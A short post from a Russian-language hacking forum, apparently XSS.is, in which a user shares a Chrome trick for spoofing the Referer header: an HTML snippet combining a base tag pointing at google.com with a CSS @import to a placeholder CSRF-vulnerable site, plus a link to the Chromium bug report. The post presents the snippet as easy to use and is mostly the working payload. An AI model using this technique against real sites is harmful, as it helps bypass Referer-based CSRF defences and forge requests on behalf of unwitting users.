• XSS.stack #1 – первый литературный журнал от юзеров форума

Подделка заголовка Referer в Chrome

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
Оказалось, что в Chrome можно подделать заголовок Referer.
Юзать очень просто
Код:
<base href="https://www.google.com/">
<style>
    @import 'https://CSRF.vulnerable.example/';
</style>
Запрос к сайту уйдет с заголовком
Referer: https://www.google.com/

инфа тут https://bugs.chromium.org/p/chromium/issues/detail?id=1152999
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх